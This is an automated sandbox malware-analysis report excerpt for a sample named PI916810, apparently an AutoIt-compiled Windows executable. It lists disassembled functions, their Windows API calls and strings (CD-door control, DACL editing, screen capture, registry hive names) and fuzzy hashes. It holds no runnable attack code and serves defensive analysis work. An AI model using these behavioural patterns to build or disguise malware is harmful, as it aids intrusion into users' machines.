                                                                                                                                                                            • Opcode ID: a226c154a38e7a408346eff6e005edf97da63097b2759f7d3176dba55702491a
                                                                                                                                                                            • Instruction ID: c349f2e89b7f84f4cdd581105711c27bb564305ecde9c94d65c234645bbab40f
                                                                                                                                                                            • Opcode Fuzzy Hash: a226c154a38e7a408346eff6e005edf97da63097b2759f7d3176dba55702491a
                                                                                                                                                                            • Instruction Fuzzy Hash: 5E51A33190020DABDF15EBE1CD82EEEB779AF04308F10016AF505721A1EB396F59DB66
                                                                                                                                                                            Function 004CA5BD Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 00469997: __itow.LIBCMT ref: 004699C2
                                                                                                                                                                              • Part of subcall function 00469997: __swprintf.LIBCMT ref: 00469A0C
                                                                                                                                                                            • CharLowerBuffW.USER32(?,?), ref: 004CA636
                                                                                                                                                                            • GetDriveTypeW.KERNEL32 ref: 004CA683
                                                                                                                                                                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 004CA6CB
                                                                                                                                                                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 004CA702
                                                                                                                                                                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 004CA730
                                                                                                                                                                              • Part of subcall function 00467D2C: _memmove.LIBCMT ref: 00467D66
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                                                                                                                                                                            • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                                                                                                                            • API String ID: 2698844021-4113822522
                                                                                                                                                                            • Opcode ID: be3451f4f042c38f92c39651c8460dcf59cc474aed8b8d7d67e4d7031765d684
                                                                                                                                                                            • Instruction ID: d35eb8deb7b91e2574050bcffc1e4e0d6dbf1157aa3da091d481f7512ab07dae
                                                                                                                                                                            • Opcode Fuzzy Hash: be3451f4f042c38f92c39651c8460dcf59cc474aed8b8d7d67e4d7031765d684
                                                                                                                                                                            • Instruction Fuzzy Hash: C95148752043049FD700EF21C89196AB7E8FF8471CF04496EF89657262EB39EE0ACB46
                                                                                                                                                                            Function 004CA45A Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 102fileCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 004CA47A
                                                                                                                                                                            • __swprintf.LIBCMT ref: 004CA49C
                                                                                                                                                                            • CreateDirectoryW.KERNEL32(?,00000000), ref: 004CA4D9
                                                                                                                                                                            • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 004CA4FE
                                                                                                                                                                            • _memset.LIBCMT ref: 004CA51D
                                                                                                                                                                            • _wcsncpy.LIBCMT ref: 004CA559
                                                                                                                                                                            • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 004CA58E
                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 004CA599
                                                                                                                                                                            • RemoveDirectoryW.KERNEL32(?), ref: 004CA5A2
                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 004CA5AC
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                                                                                                                                            • String ID: :$\$\??\%s
                                                                                                                                                                            • API String ID: 2733774712-3457252023
                                                                                                                                                                            • Opcode ID: 7b427775743558a9ccbdced4d28aa2ac1b8d1ca41fe8b4b81dd7c512c9489c72
                                                                                                                                                                            • Instruction ID: 75f76221a0e9669ac4b905727af818b40a280fe1819347195a95a9564f72c3f1
                                                                                                                                                                            • Opcode Fuzzy Hash: 7b427775743558a9ccbdced4d28aa2ac1b8d1ca41fe8b4b81dd7c512c9489c72
                                                                                                                                                                            • Instruction Fuzzy Hash: 4D31BF75900149AADB21DFA0DC88FAB73BCEF88705F1040BAFA08D6161E77496598B29
                                                                                                                                                                            Function 004EC49C Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windowCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 00462612: GetWindowLongW.USER32(?,000000EB), ref: 00462623
                                                                                                                                                                            • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 004EC4EC
                                                                                                                                                                            • GetFocus.USER32 ref: 004EC4FC
                                                                                                                                                                            • GetDlgCtrlID.USER32(00000000), ref: 004EC507
                                                                                                                                                                            • _memset.LIBCMT ref: 004EC632
                                                                                                                                                                            • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 004EC65D
                                                                                                                                                                            • GetMenuItemCount.USER32(?), ref: 004EC67D
                                                                                                                                                                            • GetMenuItemID.USER32(?,00000000), ref: 004EC690
                                                                                                                                                                            • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 004EC6C4
                                                                                                                                                                            • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 004EC70C
                                                                                                                                                                            • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 004EC744
                                                                                                                                                                            • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 004EC779
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                                                                                                                                                            • String ID: 0
                                                                                                                                                                            • API String ID: 1296962147-4108050209
                                                                                                                                                                            • Opcode ID: ead8e942d918a888fbe3cec2389380eb437c8df438da2cfe0cd9b31bdd0ccf01
                                                                                                                                                                            • Instruction ID: 3ffee41e63f63b628c99c856124e856ae266b521a5ae51da3aa51ab469a5a823
                                                                                                                                                                            • Opcode Fuzzy Hash: ead8e942d918a888fbe3cec2389380eb437c8df438da2cfe0cd9b31bdd0ccf01
                                                                                                                                                                            • Instruction Fuzzy Hash: 3781AE70108391AFD710DF26C8C4A6BBBE4FF88315F00492EF99597292D734D906CB9A
                                                                                                                                                                            Function 004B83F4 Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 004B874A: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 004B8766
                                                                                                                                                                              • Part of subcall function 004B874A: GetLastError.KERNEL32(?,004B822A,?,?,?), ref: 004B8770
                                                                                                                                                                              • Part of subcall function 004B874A: GetProcessHeap.KERNEL32(00000008,?,?,004B822A,?,?,?), ref: 004B877F
                                                                                                                                                                              • Part of subcall function 004B874A: HeapAlloc.KERNEL32(00000000,?,004B822A,?,?,?), ref: 004B8786
                                                                                                                                                                              • Part of subcall function 004B874A: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 004B879D
                                                                                                                                                                              • Part of subcall function 004B87E7: GetProcessHeap.KERNEL32(00000008,004B8240,00000000,00000000,?,004B8240,?), ref: 004B87F3
                                                                                                                                                                              • Part of subcall function 004B87E7: HeapAlloc.KERNEL32(00000000,?,004B8240,?), ref: 004B87FA
                                                                                                                                                                              • Part of subcall function 004B87E7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,004B8240,?), ref: 004B880B
                                                                                                                                                                            • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 004B8458
                                                                                                                                                                            • _memset.LIBCMT ref: 004B846D
                                                                                                                                                                            • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 004B848C
                                                                                                                                                                            • GetLengthSid.ADVAPI32(?), ref: 004B849D
                                                                                                                                                                            • GetAce.ADVAPI32(?,00000000,?), ref: 004B84DA
                                                                                                                                                                            • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 004B84F6
                                                                                                                                                                            • GetLengthSid.ADVAPI32(?), ref: 004B8513
                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 004B8522
                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 004B8529
                                                                                                                                                                            • GetLengthSid.ADVAPI32(?,00000008,?), ref: 004B854A
                                                                                                                                                                            • CopySid.ADVAPI32(00000000), ref: 004B8551
                                                                                                                                                                            • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 004B8582
                                                                                                                                                                            • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 004B85A8
                                                                                                                                                                            • SetUserObjectSecurity.USER32(?,00000004,?), ref: 004B85BC
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3996160137-0
                                                                                                                                                                            • Opcode ID: 7cb6adf339e0b3bb8bea093ae3e7be9689e37892145bb02218ec7bcb49c8fbaf
                                                                                                                                                                            • Instruction ID: 0718d158b13c7fb7365f2bef073e5f89408cb3b4dde3a8e1e399a8b4006d8935
                                                                                                                                                                            • Opcode Fuzzy Hash: 7cb6adf339e0b3bb8bea093ae3e7be9689e37892145bb02218ec7bcb49c8fbaf
                                                                                                                                                                            • Instruction Fuzzy Hash: 2561597190020ABFDF10DFA5DC85AEEBBB9FF04304F04812EE815AA291DB349A05CF64
                                                                                                                                                                            Function 004D762D Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 160windowCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetDC.USER32(00000000), ref: 004D76A2
                                                                                                                                                                            • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 004D76AE
                                                                                                                                                                            • CreateCompatibleDC.GDI32(?), ref: 004D76BA
                                                                                                                                                                            • SelectObject.GDI32(00000000,?), ref: 004D76C7
                                                                                                                                                                            • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 004D771B
                                                                                                                                                                            • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 004D7757
                                                                                                                                                                            • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 004D777B
                                                                                                                                                                            • SelectObject.GDI32(00000006,?), ref: 004D7783
                                                                                                                                                                            • DeleteObject.GDI32(?), ref: 004D778C
                                                                                                                                                                            • DeleteDC.GDI32(00000006), ref: 004D7793
                                                                                                                                                                            • ReleaseDC.USER32(00000000,?), ref: 004D779E
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                                                                                                                            • String ID: (
                                                                                                                                                                            • API String ID: 2598888154-3887548279
                                                                                                                                                                            • Opcode ID: 20b3d8fac2b1b1aead39720ecc73472e41639bd23fd1b4dabf1a057f8255f096
                                                                                                                                                                            • Instruction ID: ca0ae04a4100359e4a2fb7db8bd24267425767adf89278c1be375a27bf616700
                                                                                                                                                                            • Opcode Fuzzy Hash: 20b3d8fac2b1b1aead39720ecc73472e41639bd23fd1b4dabf1a057f8255f096
                                                                                                                                                                            • Instruction Fuzzy Hash: 0F515975904249EFCB14CFA8CC84EAEBBB9EF48310F14842EF94997311E735A945CB64
                                                                                                                                                                            Function 00466BEC Relevance: 19.7, APIs: 4, Strings: 7, Instructions: 478COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 00480B9B: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00466C6C,?,00008000), ref: 00480BB7
                                                                                                                                                                              • Part of subcall function 004648AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,004648A1,?,?,004637C0,?), ref: 004648CE
                                                                                                                                                                            • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00466D0D
                                                                                                                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00466E5A
                                                                                                                                                                              • Part of subcall function 004659CD: _wcscpy.LIBCMT ref: 00465A05
                                                                                                                                                                              • Part of subcall function 0048387D: _iswctype.LIBCMT ref: 00483885
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
                                                                                                                                                                            • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                                                                                                                                            • API String ID: 537147316-1018226102
                                                                                                                                                                            • Opcode ID: fd530f5005d63518b8f64ae2b24fefa7c3c3bd537fb7ac2073ccc69891018487
                                                                                                                                                                            • Instruction ID: 4323988f7cdc2cf6ed2ba2ad81c16d19194ae69ba1fd3e39fa9f0bfbd7e1a692
                                                                                                                                                                            • Opcode Fuzzy Hash: fd530f5005d63518b8f64ae2b24fefa7c3c3bd537fb7ac2073ccc69891018487
                                                                                                                                                                            • Instruction Fuzzy Hash: 150292701083409FCB14EF25C8919AFBBE5BF95318F04492EF485972A1EB39D949CB5B
                                                                                                                                                                            Function 004645DF Relevance: 19.7, APIs: 13, Instructions: 215windowCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • _memset.LIBCMT ref: 004645F9
                                                                                                                                                                            • GetMenuItemCount.USER32(00526890), ref: 0049D7CD
                                                                                                                                                                            • GetMenuItemCount.USER32(00526890), ref: 0049D87D
                                                                                                                                                                            • GetCursorPos.USER32(?), ref: 0049D8C1
                                                                                                                                                                            • SetForegroundWindow.USER32(00000000), ref: 0049D8CA
                                                                                                                                                                            • TrackPopupMenuEx.USER32(00526890,00000000,?,00000000,00000000,00000000), ref: 0049D8DD
                                                                                                                                                                            • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 0049D8E9
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow_memset
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2751501086-0
                                                                                                                                                                            • Opcode ID: 5fbb7a45d6501291a09f27f3bc6f1aeb3fa6bf02830fbf13faeb723da187f1f3
                                                                                                                                                                            • Instruction ID: a03366a266c30004489164ae83549bb674ef54c759a172290892c589e84c3bce
                                                                                                                                                                            • Opcode Fuzzy Hash: 5fbb7a45d6501291a09f27f3bc6f1aeb3fa6bf02830fbf13faeb723da187f1f3
                                                                                                                                                                            • Instruction Fuzzy Hash: C7711770A00205BEEF209F55DC85FABBF64FF45368F200227F5256A2E1C7B95810DB99
                                                                                                                                                                            Function 004D8BC0 Relevance: 19.6, APIs: 10, Strings: 1, Instructions: 324fileCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • VariantInit.OLEAUT32(?), ref: 004D8BEC
                                                                                                                                                                            • CoInitialize.OLE32(00000000), ref: 004D8C19
                                                                                                                                                                            • CoUninitialize.OLE32 ref: 004D8C23
                                                                                                                                                                            • GetRunningObjectTable.OLE32(00000000,?), ref: 004D8D23
                                                                                                                                                                            • SetErrorMode.KERNEL32(00000001,00000029), ref: 004D8E50
                                                                                                                                                                            • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,004F2C0C), ref: 004D8E84
                                                                                                                                                                            • CoGetObject.OLE32(?,00000000,004F2C0C,?), ref: 004D8EA7
                                                                                                                                                                            • SetErrorMode.KERNEL32(00000000), ref: 004D8EBA
                                                                                                                                                                            • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 004D8F3A
                                                                                                                                                                            • VariantClear.OLEAUT32(?), ref: 004D8F4A
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                                                                                                                                            • String ID: ,,O
                                                                                                                                                                            • API String ID: 2395222682-289689913
                                                                                                                                                                            • Opcode ID: bb96303b1c2f8bf193771f56c5d1891b412f2676a5b530e54a8d40cacf927d12
                                                                                                                                                                            • Instruction ID: 3759ad261665334da2e4a18e910736d97cad1e9b7579b1470f962991db0bc58b
                                                                                                                                                                            • Opcode Fuzzy Hash: bb96303b1c2f8bf193771f56c5d1891b412f2676a5b530e54a8d40cacf927d12
                                                                                                                                                                            • Instruction Fuzzy Hash: 06C111B1208305AFC700EF25C89492BB7E9BF89748F00496EF58A9B351DB75ED06CB56
                                                                                                                                                                            Function 004E10A5 Relevance: 19.4, APIs: 1, Strings: 10, Instructions: 120COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • CharUpperBuffW.USER32(?,?,?,?,?,?,?,004E0038,?,?), ref: 004E10BC
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: BuffCharUpper
                                                                                                                                                                            • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                                                                                                                            • API String ID: 3964851224-909552448
                                                                                                                                                                            • Opcode ID: 1c6b005910e7f3662e33487853d0fb70d52c04ace57febc8953331e2fa67fe1d
                                                                                                                                                                            • Instruction ID: 74250748793dbf7cdec915a7bc05ec24fc48cb0b8860bdd7e87896a051e88f2c
                                                                                                                                                                            • Opcode Fuzzy Hash: 1c6b005910e7f3662e33487853d0fb70d52c04ace57febc8953331e2fa67fe1d
                                                                                                                                                                            • Instruction Fuzzy Hash: BA41933029028E9BEF10EF92DC91AEF3761BF19305F00445AFD915B261DB38AD5AC759
                                                                                                                                                                            Function 004C5569 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 74COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 00467D2C: _memmove.LIBCMT ref: 00467D66
                                                                                                                                                                              • Part of subcall function 00467A84: _memmove.LIBCMT ref: 00467B0D
                                                                                                                                                                            • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 004C55D2
                                                                                                                                                                            • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 004C55E8
                                                                                                                                                                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 004C55F9
                                                                                                                                                                            • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 004C560B
                                                                                                                                                                            • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 004C561C
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037134858.000000000051F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037285806.0000000000528000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_460000_PI916810.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: SendString$_memmove
                                                                                                                                                                            • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                                                                                                                            • API String ID: 2279737902-1007645807
                                                                                                                                                                            • Opcode ID: ffae6427166d4e479359f40d3f40f1a5b0911777528a2da95fec0539e7342370
                                                                                                                                                                            • Instruction ID: 4da55313ce069bdbf27055c5850c0763d9af669a8cec085fa39e0dc7edfb1ee9
                                                                                                                                                                            • Opcode Fuzzy Hash: ffae6427166d4e479359f40d3f40f1a5b0911777528a2da95fec0539e7342370
                                                                                                                                                                            • Instruction Fuzzy Hash: 3C110824A5015979E721B6A2CC49EFFBF7CFF91B04F40082FB414A20C2EE681D85C5A6
                                                                                                                                                                            Function 004C48F3 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 73networkCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.2037034054.0000000000461000.00000020.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.2037013479.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.2037090221.0000000000515000.00000002.00000001.01000000.00000003.sdmpDownload File
